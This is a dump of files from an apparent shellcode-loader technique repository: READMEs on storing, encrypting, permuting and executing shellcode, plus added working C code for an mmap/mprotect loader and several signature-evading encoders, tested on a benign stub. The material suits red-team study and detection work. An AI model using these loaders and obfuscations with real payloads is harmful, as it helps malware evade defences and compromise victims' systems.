/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin 
--------------------------------------------------------------------------------
/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/aes/CryptDecrypt/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/cipherunicorn-a/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/stream/rc4/SystemFunction/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceTypes/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin

STRINGTABLE
BEGIN
    ID_STRING "Reversing.ID Shellcode Loader"
END
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin

STRINGTABLE
BEGIN
    ID_STRING "Reversing.ID Shellcode Loader"
END
--------------------------------------------------------------------------------
/windows/writing/misc/rust/memmap2/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies]
memmap2 = "0.9.4"
--------------------------------------------------------------------------------
/windows/execution/exception/seh-catch-exception/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing an exception to run the shellcode.

### Overview

Run the shellcode from within an exception handler.

### Reference

--------------------------------------------------------------------------------
/windows/storage/stack/dart/pubspec.yaml:
--------------------------------------------------------------------------------
name: shellcode_loader
description:
  simple dart code to load shellcode at runtime
version: 1.0.0

environment:
  sdk: '>=2.10.0 <3.0.0'

dependencies:
  ffi: ^1.0.0
--------------------------------------------------------------------------------
/linux/execution/invoke/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Run the shellcode by casting its address to a function/procedure pointer and calling it directly. The shellcode then executes on the same thread as the caller, so if it does not return cleanly (or never returns) the calling thread is lost with it.
--------------------------------------------------------------------------------
/windows/writing/encryption/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Encrypt the payload with various algorithms.

See also [Crypto Reference](https://github.com/ReversingID/Crypto-Reference) for more information.
--------------------------------------------------------------------------------
/windows/execution/invoke/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Run the shellcode by casting its address to a function/procedure pointer and calling it directly. The shellcode executes on the same thread as the caller.
--------------------------------------------------------------------------------
/windows/writing/permutation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Shuffle/permute the shellcode, i.e. scramble the order of its bytes. The ordering schedule is derived from a seed, so the same seed regenerates the same permutation when decoding.

The stored shellcode has the format `[Seed] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/linux/storage/stack/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as local data on the stack (array).

### Overview

The shellcode is stored as an array of bytes on the stack, recognisable by the sequence of push/store operations that build it at runtime. The array is accessed through an address relative to the stack (or frame) pointer.
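Added example (my code, not part of the Shellcode-Loader repository) tying together the Linux READMEs on this page: the shellcode is kept as a local array on the stack (`linux/storage/stack`), a region is obtained with `mmap` (`linux/allocation`), the bytes are copied in, the region is switched from RW to RX with `mprotect` (`linux/permission`), and the address is cast to a function pointer and called on the calling thread (`linux/execution/invoke`). The "shellcode" is a constructed stub that only returns 42, which makes the call verifiable; the page-size rounding, the RW-then-RX ordering and the instruction-cache flush are my choices, not the repository's.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE     /* MAP_ANONYMOUS under strict -std=c99 */
#endif
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed stand-in for real shellcode: a position-independent stub that
 * just returns 42 to its caller, so the call can be verified. Not from the repo. */
#if defined(__x86_64__)
#define STUB_BYTES { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 }             /* mov eax,42 ; ret */
#elif defined(__aarch64__)
#define STUB_BYTES { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 } /* mov w0,#42 ; ret */
#else
#error "stub bytes provided only for x86-64 and aarch64"
#endif

typedef int (*shellcode_fn)(void);

/* allocation -> writing -> permission -> execution.
 * Returns what the shellcode returns, or -1 if any step fails. */
int run_shellcode(const unsigned char *code, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || len == 0)
        return -1;
    size_t size = ((len + (size_t)page - 1) / (size_t)page) * (size_t)page;

    /* allocation: private anonymous mapping, writable but not yet executable */
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;

    /* writing: copy the (already decoded) shellcode into the mapping */
    memcpy(mem, code, len);

    /* permission: flip RW -> RX. Never leave the region RWX: an RWX anonymous
     * mapping is both a common detection signal and needless exposure. */
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return -1;
    }
    /* required on aarch64 (separate I/D caches); a no-op on x86-64 */
    __builtin___clear_cache((char *)mem, (char *)mem + len);

    /* execution (invoke): cast and call on the current thread */
    shellcode_fn fn = (shellcode_fn)(uintptr_t)mem;
    int rv = fn();

    munmap(mem, size);
    return rv;
}

/* storage/stack: the stub lives in a local array of the calling function */
int run_stub_from_stack(void)
{
    unsigned char sc[] = STUB_BYTES;
    return run_shellcode(sc, sizeof sc);
}

int main(void)
{
    printf("stub returned %d\n", run_stub_from_stack());
    return 0;
}
```

Calling `fn()` before the `mprotect` step would fault on any NX-enforcing kernel, which is the exception the `allocation` README warns about; the cast goes through `uintptr_t` because ISO C does not define a direct conversion from `void *` to a function pointer.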
--------------------------------------------------------------------------------
/windows/writing/permutation/column-ordering/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with a custom algorithm.

### Overview

Arrange the bytes into a matrix and reorder them by reading the matrix column by column.

The stored shellcode has the format `[Key] [Seed] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/permutation/row-ordering/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with a custom algorithm.

### Overview

Arrange the bytes into a matrix and reorder them by reading the matrix row by row.

The stored shellcode has the format `[Key] [Seed] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/writing/substitution/atbash/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transforming the shellcode by byte substitution.

### Overview

Uses the classical Atbash cipher, replacing each byte by its mirror image in the alphabet. Over a 256-symbol alphabet the formula for both encryption and decryption is the same, `255 - x`: the cipher is an involution, so applying it twice restores the original.
--------------------------------------------------------------------------------
/windows/writing/permutation/fisher-yates/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with a custom algorithm.

### Overview

Uses the Fisher-Yates shuffle to permute the bytes.

### Reference

- [Wiki Fisher-Yates Shuffle](https://en.wikipedia.org/wiki/Fisher%E2%80%93Yates_shuffle)
--------------------------------------------------------------------------------
/linux/allocation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `allocation` techniques create a region large enough to hold the shellcode extracted from its storage location (global/stack/resource/download). The allocated memory must be marked executable before control is transferred to it; otherwise, with NX/DEP enforced, the jump into the region raises an exception (access violation / segmentation fault).
--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with a custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. Split the shellcode into a sequence of byte pairs; within each pair one byte serves as the key and the other as the data that is XORed with it.
--------------------------------------------------------------------------------
/windows/storage/global/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as global data (array).

### Overview

The shellcode is stored as an array of bytes in the global data segment and is reachable through a constant memory address.

Note: the samples here execute the shellcode by running it on a separate thread.
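Added example (my code, not the repository's) for the `permutation` and `fisher-yates` READMEs above: a seed-driven Fisher-Yates shuffle that produces the `[Seed] [Encoded Shellcode]` layout, and the matching inverse permutation. The repository does not say which generator schedules the shuffle or how wide the seed is, so this assumes a 4-byte little-endian seed feeding an xorshift32 generator; the 16-byte sample input is constructed, not real shellcode.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SEED_LEN 4  /* assumption: [Seed] is a 32-bit little-endian value */

/* Assumed schedule generator: xorshift32. Any deterministic PRNG works as
 * long as encoder and decoder agree on it. */
static uint32_t xorshift32(uint32_t *state)
{
    uint32_t x = *state;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    return *state = x;
}

/* Fisher-Yates: perm[] becomes a permutation of 0..n-1 fully determined by
 * the seed. The "% (i + 1)" step has a slight modulo bias: fine for
 * obfuscation, not for anything that needs uniformity. */
static void build_permutation(uint32_t seed, size_t *perm, size_t n)
{
    uint32_t state = seed ? seed : 1;  /* xorshift32 must not start at 0 */
    for (size_t i = 0; i < n; i++)
        perm[i] = i;
    for (size_t i = n; i-- > 1;) {     /* i runs n-1 down to 1 */
        size_t j = (size_t)(xorshift32(&state) % (uint32_t)(i + 1));
        size_t t = perm[i]; perm[i] = perm[j]; perm[j] = t;
    }
}

/* Encode: out = [Seed][shuffled]; returns bytes written, 0 on error. */
size_t permute_encode(const uint8_t *in, size_t n, uint32_t seed,
                      uint8_t *out, size_t out_cap)
{
    if (out_cap < n + SEED_LEN)
        return 0;
    size_t *perm = malloc((n ? n : 1) * sizeof *perm);
    if (!perm)
        return 0;
    build_permutation(seed, perm, n);
    out[0] = (uint8_t)seed;         out[1] = (uint8_t)(seed >> 8);
    out[2] = (uint8_t)(seed >> 16); out[3] = (uint8_t)(seed >> 24);
    for (size_t i = 0; i < n; i++)
        out[SEED_LEN + i] = in[perm[i]];   /* output position i takes input byte perm[i] */
    free(perm);
    return n + SEED_LEN;
}

/* Decode: regenerate the permutation from the stored seed and undo it. */
size_t permute_decode(const uint8_t *enc, size_t enc_len, uint8_t *out, size_t out_cap)
{
    if (enc_len < SEED_LEN || out_cap < enc_len - SEED_LEN)
        return 0;
    size_t n = enc_len - SEED_LEN;
    uint32_t seed = (uint32_t)enc[0] | (uint32_t)enc[1] << 8 |
                    (uint32_t)enc[2] << 16 | (uint32_t)enc[3] << 24;
    size_t *perm = malloc((n ? n : 1) * sizeof *perm);
    if (!perm)
        return 0;
    build_permutation(seed, perm, n);
    for (size_t i = 0; i < n; i++)
        out[perm[i]] = enc[SEED_LEN + i];  /* inverse: byte i goes back to perm[i] */
    free(perm);
    return n;
}

/* Constructed 16-byte sample (distinct bytes, not real shellcode). */
static const uint8_t SAMPLE[16] = { 0x31, 0xc0, 0x48, 0x83, 0xec, 0x28, 0x65, 0x4c,
                                    0x8b, 0x04, 0x25, 0x60, 0x00, 0x90, 0xc3, 0xcc };

/* Self-test: returns 0 on success, otherwise the number of the failed check. */
int permute_selftest(void)
{
    uint8_t enc[sizeof SAMPLE + SEED_LEN], dec[sizeof SAMPLE];
    if (permute_encode(SAMPLE, sizeof SAMPLE, 0x12345678u, enc, sizeof enc) != sizeof enc)
        return 1;
    if (enc[SEED_LEN + 15] != SAMPLE[5])  /* with this seed the first swap is 15 <-> 5 */
        return 2;
    if (permute_decode(enc, sizeof enc, dec, sizeof dec) != sizeof dec ||
        memcmp(dec, SAMPLE, sizeof SAMPLE) != 0)
        return 3;
    enc[0] ^= 0x01;                        /* a wrong seed must not recover the input */
    if (permute_decode(enc, sizeof enc, dec, sizeof dec) != sizeof dec ||
        memcmp(dec, SAMPLE, sizeof SAMPLE) == 0)
        return 4;
    return 0;
}

int main(void)
{
    printf("permutation self-test: %d\n", permute_selftest());
    return 0;
}
```

The decoder never stores the permutation itself; it regenerates it from the seed, which is the whole point of seeding the schedule. Note that a permutation preserves the byte histogram of the shellcode, so it hides instruction sequences from signatures but not the byte distribution from entropy or frequency checks.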
--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with a custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. A single key is stored as the first byte and reused for every byte of the shellcode.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/linux/permission/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `permission` techniques change (set/clear) the executable bit of a memory region, which tells the MMU whether that region may be executed.

### Catalog

Implemented `permission` techniques:

- [mprotect](mprotect)
--------------------------------------------------------------------------------
/windows/execution/invoke/rust/with-mmap/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
libc = "0.2.151"
mmap = "0.1.1"
--------------------------------------------------------------------------------
/windows/writing/substitution/affine-cipher/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transforming the shellcode by byte substitution.

### Overview

Uses the classical Affine Cipher, replacing each byte `x` by `(a*x + b) mod m` with a=197, b=37, m=256. Decryption computes `i*(y - b) mod m`, where i is the multiplicative inverse of a modulo m, here i=13 (197 * 13 = 2561 = 10 * 256 + 1), b=37 and m=256. `a` must be odd for such an inverse modulo 256 to exist.
--------------------------------------------------------------------------------
/windows/writing/substitution/hill-cipher/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transforming the shellcode by byte substitution.

### Overview

Uses the classical Hill Cipher, replacing bytes by multiplying each pair of bytes with a matrix (arithmetic mod 256). This sample uses the matrix `[[197, 0], [0, 173]]` and the inverse matrix `[[13, 0], [0, 37]]`.
--------------------------------------------------------------------------------
/windows/writing/copy/memcpy/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode with `memcpy`.

```c++
void * memcpy (void * destination, const void * source, size_t num);
```

### Reference

- [C++ memcpy](https://www.cplusplus.com/reference/cstring/memcpy/)
--------------------------------------------------------------------------------
/linux/writing/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `writing` techniques are methods of transforming the stored shellcode. Shellcode stored in plain form is very likely to be detected by static signatures, so it is scrambled to disguise it. To recover the original shellcode, the inverse transformation is applied before or while writing the shellcode to the target memory region.
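Added example (my code, not from the repository) covering the substitution READMEs on this page (`atbash`, `affine-cipher`, `hill-cipher`) with the exact parameters they state: a=197, b=37 for the affine cipher, the matrix `[[197, 0], [0, 173]]` for the Hill cipher, and `255 - x` for Atbash, which is the affine case a=255, b=255. It derives the inverses (13, 37 and the inverse matrix `[[13, 0], [0, 37]]`) instead of hard-coding them, so a different key can be checked for invertibility. The `inverse_mod256` and `hill_invert` helpers, the even-length requirement for Hill and the 16-byte sample are my additions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Multiplicative inverse of a modulo 256, or 0 if none exists (a must be odd). */
uint8_t inverse_mod256(uint8_t a)
{
    for (unsigned i = 1; i < 256; i++)
        if ((uint8_t)(a * i) == 1)
            return (uint8_t)i;
    return 0;
}

/* Affine: y = (a*x + b) mod 256, in place. Atbash (255 - x) is the case a=255, b=255. */
void affine_encode(uint8_t *buf, size_t n, uint8_t a, uint8_t b)
{
    for (size_t i = 0; i < n; i++)
        buf[i] = (uint8_t)(a * buf[i] + b);
}

/* Affine inverse: x = inv(a) * (y - b) mod 256. Returns -1 when a has no inverse. */
int affine_decode(uint8_t *buf, size_t n, uint8_t a, uint8_t b)
{
    uint8_t inv = inverse_mod256(a);
    if (!inv)
        return -1;
    for (size_t i = 0; i < n; i++)
        buf[i] = (uint8_t)(inv * (uint8_t)(buf[i] - b));
    return 0;
}

/* Hill 2x2 over Z/256: (x0, x1) -> (m0*x0 + m1*x1, m2*x0 + m3*x1), m row-major.
 * Assumption: the README works on byte pairs, so an odd length is rejected. */
int hill_apply(uint8_t *buf, size_t n, const uint8_t m[4])
{
    if (n % 2)
        return -1;
    for (size_t i = 0; i < n; i += 2) {
        uint8_t x0 = buf[i], x1 = buf[i + 1];
        buf[i]     = (uint8_t)(m[0] * x0 + m[1] * x1);
        buf[i + 1] = (uint8_t)(m[2] * x0 + m[3] * x1);
    }
    return 0;
}

/* inv = det^-1 * adj(M) mod 256; -1 if det is even (matrix not invertible). */
int hill_invert(const uint8_t m[4], uint8_t inv[4])
{
    uint8_t d = inverse_mod256((uint8_t)(m[0] * m[3] - m[1] * m[2]));
    if (!d)
        return -1;
    inv[0] = (uint8_t)(d * m[3]);
    inv[1] = (uint8_t)(d * (uint8_t)(0 - m[1]));
    inv[2] = (uint8_t)(d * (uint8_t)(0 - m[2]));
    inv[3] = (uint8_t)(d * m[0]);
    return 0;
}

/* Constructed 16-byte sample (not real shellcode). */
static const uint8_t SAMPLE[16] = { 0x31, 0xc0, 0x48, 0x83, 0xec, 0x28, 0x65, 0x4c,
                                    0x8b, 0x04, 0x25, 0x60, 0x00, 0x90, 0xc3, 0xcc };

/* Self-test with the page's parameters: 0 on success, else the failed check number. */
int substitution_selftest(void)
{
    static const uint8_t M[4] = { 197, 0, 0, 173 };
    uint8_t buf[sizeof SAMPLE], inv[4];

    if (inverse_mod256(197) != 13 || inverse_mod256(173) != 37) return 1;
    memcpy(buf, SAMPLE, sizeof buf);
    affine_encode(buf, sizeof buf, 197, 37);           /* 197x+37 = x has no solution mod 256 */
    if (memcmp(buf, SAMPLE, sizeof buf) == 0) return 2;
    if (affine_decode(buf, sizeof buf, 197, 37) || memcmp(buf, SAMPLE, sizeof buf)) return 3;
    buf[0] = 0x90;
    affine_encode(buf, 1, 255, 255);                   /* atbash: 0x90 -> 0x6f */
    if (buf[0] != 0x6f) return 4;
    if (hill_invert(M, inv) || inv[0] != 13 || inv[1] || inv[2] || inv[3] != 37) return 5;
    memcpy(buf, SAMPLE, sizeof buf);
    if (hill_apply(buf, sizeof buf, M) || memcmp(buf, SAMPLE, sizeof buf) == 0) return 6;
    if (hill_apply(buf, sizeof buf, inv) || memcmp(buf, SAMPLE, sizeof buf)) return 7;
    if (hill_apply(buf, 3, M) != -1 || affine_decode(buf, sizeof buf, 2, 0) != -1) return 8;
    return 0;
}

int main(void)
{
    printf("substitution self-test: %d\n", substitution_selftest());
    return 0;
}
```

With a diagonal matrix the Hill step degenerates into two independent affine multiplications (no `b`), which is why the inverse matrix on the page is just the two byte inverses 13 and 37; `hill_invert` handles the general 2x2 case as well, where the determinant must be odd.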
--------------------------------------------------------------------------------
/windows/storage/section/rust/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/execution/asm-jmp/rust/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/storage/resource/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as an embedded resource in the executable.

### Overview

The shellcode is stored as an array of bytes and embedded as a resource. It is accessed through the usual sequence of resource-reading operations (locate, load and lock the resource).

Note: the samples here execute the shellcode by running it on a separate thread.
--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-windows-sys/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies]
windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_Security"]}
--------------------------------------------------------------------------------
/windows/execution/callback/EnumWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumWindows`, passing the shellcode address as the enumeration callback.

```c++
BOOL EnumWindows (WNDENUMPROC lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows)
--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiber/rust/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/rust/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/storage/stack/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as local data on the stack (array).

### Overview

The shellcode is stored as an array of bytes on the stack, recognisable by the sequence of push/store operations that build it at runtime. The array is accessed through an address relative to the stack (or frame) pointer.

Note: the samples here execute the shellcode by running it on a separate thread.
--------------------------------------------------------------------------------
/windows/storage/stack/rust/plain-winapi/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/writing/encryption/block/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption with a block cipher.

### Overview

A block cipher is an encryption algorithm that operates on blocks of a fixed size. The shellcode is treated as the plaintext and split into such blocks (the last block is padded up to the block size where needed).

The algorithms use a symmetric key: the same key is used for encryption and decryption. Since the loader must carry (or derive) that key to decrypt the payload, this hides the shellcode from static scanning; it does not protect it from an analyst who has the loader.

--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with a custom algorithm.

### Overview

The shellcode is encrypted with a simple XOR. A single key is stored as the first byte and used to encrypt the shellcode; after each byte is encrypted the key value is incremented, so every position uses a different key byte.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.
--------------------------------------------------------------------------------
/windows/execution/thread/TpSimpleTryPost/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `TpSimpleTryPost`, which posts the callback to the thread pool.

`TpSimpleTryPost` is an internal, low-level function (undocumented, exported by ntdll).

```c++
NTSTATUS TpSimpleTryPost(PTP_SIMPLE_CALLBACK callback, PVOID args, PTP_CALLBACK_ENVIRON environ);
```

### Reference

--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with a custom algorithm.

### Overview

Insert a one-byte length prefix before each block of shellcode. That byte records the block size, i.e. how many shellcode bytes follow it in that block, so block sizes may vary from block to block.

The stored shellcode has the format `[M] [M-byte Shellcode] [N] [N-byte Shellcode] ... [Z] [Z-byte Shellcode]`.
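Added example (my code, not the repository's) for the `xor-singlekey-ctr` and `padding-dynamic` READMEs above: an encoder/decoder pair for the `[Key] [Encoded Shellcode]` counter-XOR layout and one for the `[M] [M-byte Shellcode] [N] [N-byte Shellcode] ...` layout. Two details the READMEs leave open are assumptions here: the counter key wraps modulo 256, and the block sizes for padding come from a caller-supplied schedule that is cycled through. The decoder additionally rejects a length byte that runs past the end of the input, which is the check you want before trusting any embedded length field. The 20-byte sample is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* xor-singlekey-ctr: out = [Key][in[0]^key][in[1]^(key+1)]...
 * Assumption: the counter wraps modulo 256. Returns bytes written, 0 on error. */
size_t xorctr_encode(const uint8_t *in, size_t n, uint8_t key, uint8_t *out, size_t cap)
{
    if (cap < n + 1)
        return 0;
    out[0] = key;
    for (size_t i = 0; i < n; i++, key++)
        out[1 + i] = in[i] ^ key;
    return n + 1;
}

size_t xorctr_decode(const uint8_t *enc, size_t len, uint8_t *out, size_t cap)
{
    if (len < 1 || cap < len - 1)
        return 0;
    uint8_t key = enc[0];
    for (size_t i = 0; i + 1 < len; i++, key++)
        out[i] = enc[1 + i] ^ key;
    return len - 1;
}

/* padding-dynamic: [M][M bytes][N][N bytes]... Assumption: block sizes come from a
 * caller-supplied schedule that is cycled; the last block holds whatever remains. */
size_t padding_encode(const uint8_t *in, size_t n, const uint8_t *sizes, size_t nsizes,
                      uint8_t *out, size_t cap)
{
    size_t i = 0, o = 0, k = 0;
    if (nsizes == 0)
        return 0;
    while (i < n) {
        size_t m = sizes[k++ % nsizes];
        if (m == 0)                    /* a zero-length block would never advance */
            return 0;
        if (m > n - i)
            m = n - i;
        if (o + 1 + m > cap)
            return 0;
        out[o++] = (uint8_t)m;
        memcpy(out + o, in + i, m);
        o += m;
        i += m;
    }
    return o;
}

/* Decoder: every length byte is checked against the bytes actually left, so a
 * corrupted or truncated blob fails (returns 0) instead of reading past the end. */
size_t padding_decode(const uint8_t *enc, size_t len, uint8_t *out, size_t cap)
{
    size_t i = 0, o = 0;
    while (i < len) {
        size_t m = enc[i++];
        if (m > len - i || m > cap - o)
            return 0;
        memcpy(out + o, enc + i, m);
        i += m;
        o += m;
    }
    return o;
}

/* Constructed 20-byte sample (not real shellcode). */
static const uint8_t SAMPLE[20] = { 0x48, 0x31, 0xc9, 0x48, 0x81, 0xe9, 0xc6, 0xff, 0xff, 0xff,
                                    0x48, 0x8d, 0x05, 0xef, 0xff, 0xff, 0xff, 0x48, 0xbb, 0x90 };

/* Self-test: 0 on success, otherwise the number of the failed check. */
int writing_selftest(void)
{
    static const uint8_t nops[3] = { 0x90, 0x90, 0x90 }, sizes[3] = { 7, 3, 5 };
    uint8_t enc[64], dec[64];
    size_t n;

    /* known answer: key 0x10 over three 0x90 bytes -> 10 80 81 82 */
    if (xorctr_encode(nops, 3, 0x10, enc, sizeof enc) != 4)
        return 1;
    if (enc[0] != 0x10 || enc[1] != 0x80 || enc[2] != 0x81 || enc[3] != 0x82)
        return 2;
    if (xorctr_decode(enc, 4, dec, sizeof dec) != 3 || memcmp(dec, nops, 3) != 0)
        return 3;

    /* 20 bytes with schedule 7,3,5 -> blocks of 7,3,5,5 -> 4 length bytes + 20 = 24 */
    n = padding_encode(SAMPLE, sizeof SAMPLE, sizes, 3, enc, sizeof enc);
    if (n != 24 || enc[0] != 7 || enc[8] != 3 || enc[12] != 5 || enc[18] != 5)
        return 4;
    if (padding_decode(enc, n, dec, sizeof dec) != 20 || memcmp(dec, SAMPLE, 20) != 0)
        return 5;
    enc[18] = 9;                       /* length byte now overruns the input */
    if (padding_decode(enc, n, dec, sizeof dec) != 0)
        return 6;
    return 0;
}

int main(void)
{
    printf("writing self-test: %d\n", writing_selftest());
    return 0;
}
```

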